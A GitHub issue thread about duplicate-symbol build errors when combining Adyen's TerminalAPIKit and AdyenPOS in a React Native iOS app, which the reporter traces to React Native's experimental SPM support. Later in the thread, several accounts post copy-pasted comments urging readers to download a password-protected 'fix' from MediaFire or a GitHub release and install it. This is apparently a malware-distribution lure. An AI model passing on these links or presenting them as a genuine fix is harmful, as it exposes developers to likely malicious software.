### ISSUE TITLE
Unable to use TerminalAPIKit with AdyenPOS. Duplicate symbol errors

### ISSUE THREAD

**Issue by jpudysz** [Adyen/adyen-terminal-api-ios#26]
**Describe the bug**

Hello Adyen team,

I'm trying to integrate Tap-to-Pay for iOS and have completed the "Add the iOS SDK" section without any issues. Now, I'm attempting to [Make a transaction](https://docs.adyen.com/point-of-sale/ipp-mobile/tap-to-pay/payments-ttp/#use-the-warm-up-function) but encountering "duplicate symbol" errors that prevent AdyenPOS and TerminalAPKIKit from building together.

Is it possible to build a Nexo request without TerminalAPKIKit, or might I be missing something?

**To Reproduce**
1. Add SPM dependency: AdyenPOS v.2.2.0
2. Optionally - compile it - it should work
3. Add SPM dependency: TerminalAPKIKit v.2.0.0
4. Build your project
5. See error, app can't compile anymore

**Expected behavior**
Both dependencies should compile without `duplicate symbol` issues

**Screenshots**

![image](https://github.com/user-attachments/assets/336a83a4-d3af-4df0-a330-8547738f754e)
![Screenshot 2024-08-08 at 12 20 22](https://github.com/user-attachments/assets/c7176071-ee6e-4bda-b231-a461fa677773)
![Screenshot 2024-08-08 at 12 20 50](https://github.com/user-attachments/assets/159dc722-0de5-4c39-9493-1c52c00a00f8)

**Smartphone (please complete the following information):**
 - Device: iPhone 15 Pro
 - OS: iOS17.5

**Comment by kaphacius** [comment]
hi @jpudysz ,

Thank you for opening an issue.

It is definitely possible to construct a Nexo request without `TerminalAPIKit`, you would just need to define your own structures. That is not recommended though, since there are a lot of different fields that are present in a nexo request.

Before you try to do that, let's try to fix the issue you are having. I noticed you are using React Native for your project, so it might be something with the setup, where `TerminalAPIKit` is linked twice. I don't think `AdyenPOS` is the problem here.
Could you try adding `TerminalAPIKit` before adding `AdyenPOS` and verifying it compiles? If it does not - can you check whether `TerminalAPIKit` is linked twice?

Cheers

**Comment by jpudysz** [comment]
I agree, `AdyenPOS` is not a problem here for sure.
With single `TerminalAPIKit` added with SPM the problem persists.

![image](https://github.com/user-attachments/assets/a1d7b219-08ed-47ea-87ec-7afecb01f481)

I can also confirm, that creating a clean SwiftUI project with `TerminalAPIKit` compiles without any issues.

I will dig deeper and post here any updates.

**Comment by jpudysz** [comment]
@kaphacius here are my findings:

I'm using experimental SPM support for React Native. The issue is related to [this discussion](https://forums.swift.org/t/objc-flag-causes-duplicate-symbols-with-swift-packages/27926), with more details available [here](https://github.com/facebook/react-native/pull/44627#issue-2306474497).

This is not a `TerminalAPIKit` issue, and I was able to fix it. Thank you for the assistance!

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Dnts1** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 64dB0y** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by fobos531** [comment]
Hello @jpudysz, could you expand your previous comment to clarify how you fixed it?

**Comment by jerearaujo03** [comment]
@jpudysz please share the solution
